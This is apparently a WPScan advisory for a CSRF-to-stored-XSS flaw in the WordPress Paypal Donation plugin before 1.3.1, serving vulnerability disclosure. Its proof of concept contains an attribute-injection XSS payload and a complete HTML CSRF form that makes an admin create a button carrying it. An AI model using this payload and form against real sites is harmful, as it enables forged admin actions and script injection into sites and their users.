WordPress Plugin Vulnerabilities
Paypal Donation < 1.3.1 - CSRF to Stored Cross-Site Scripting
Description
The plugin offers a function to create donation buttons, which internally are posts. The process to create a new button is lacking a CSRF check. An attacker could use this to make an authenticated admin create a new button. Furthermore, one of the Button field is not escaped before being output in an attribute when editing a Button, leading to a Stored Cross-Site Scripting issue as well.
Proof of Concept
Create/Edit a Button and put the following payload in the Amount Menu Name field (wpedon_button_scpriceprice parameter): " autofocus=autofocus onfocus=alert(/XSS/) e=
Via CSRF:
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=wpedon_buttons&action=new" method="POST">
<input type="hidden" name="wpedon_button_name" value="Test" />
<input type="hidden" name="wpedon_button_price" value="" />
<input type="hidden" name="wpedon_button_scpriceprice" value='" autofocus=autofocus onfocus=alert(/XSS/) e=' />
<input type="hidden" name="update" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The name, price and id params are not required. But they are displayed on the buttons overview and can be used to attract the victims attention to edit the Button.
The XSS will trigger when editing the affected Button
Affects Plugins
Fixed in 1.3.1 References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-04 (about 2 years ago)
Added
2021-10-04 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)
WPScan 